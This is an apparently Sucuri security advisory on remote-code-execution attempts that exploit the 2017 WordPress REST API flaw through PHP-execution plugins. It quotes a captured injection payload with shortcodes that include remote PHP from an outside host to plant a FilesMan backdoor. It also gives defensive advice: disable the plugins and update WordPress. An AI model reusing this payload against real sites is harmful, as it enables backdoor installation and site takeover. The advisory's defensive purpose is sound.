RCE Attempts Against the Latest WordPress REST API Vulnerability

  • February 9, 2017

We are starting to see remote command execution (RCE) attempts trying to exploit the latest WordPress REST API Vulnerability.

These RCE attempts started today after a few days of attackers (mostly defacers) rushing to vandalize as many pages as they could. The RCE attempts we are seeing in the wild do not affect every WordPress sites, only the ones using plugins that allow for PHP execution from within posts and pages.

Attacks in the Wild

The attackers in the wild are trying to exploit sites that have plugins like the Insert PHP (100k+ installs), Exec-PHP (100k+ installs) and similar installed plugins. These plugins, allow users to insert PHP code directly into the posts as a way to make customizations easier. Coupled with this vulnerability, it allows the attackers to execute PHP code when injecting their content into the database.

For example, this first campaign we are seeing is trying to inject a PHP include to content of different posts to see if it gets executed. This is the payload:

content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}

It tries to leverage the format parsed by these plugins to include code from acommeamour.fr (likely a compromised site) and executes a malicious code to inject a backdoor into the file. In the current format, it downloads a FilesMan backdoor and hides it into /wp-content/uploads/

Monetization Strategy

First of all, if you have any of these plugins, we recommend disabling them. We believe that PHP code should be run within a plugin or theme. It should not be run directly from the posts.

Second, it seems attackers are starting to think of ways to monetize this vulnerability. Defacements don’t offer economic returns, so that will likely die soon. What will remain are attempts to execute commands (RCE) as it gives the attackers full control of a site – and offers multiple ways to monetize – and SPAM SEO / affiliate link / ad injections. We are starting to see them being attempted on a few sites, and that will likely be the direction this vulnerability will be misused in the coming days, weeks and possibly months.

Third – update to WordPress 4.7.2 now!

Websites behind the Sucuri Firewall are protected against this threat via Virtual Hardening / Patching.

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags
Related Categories
You May Also Like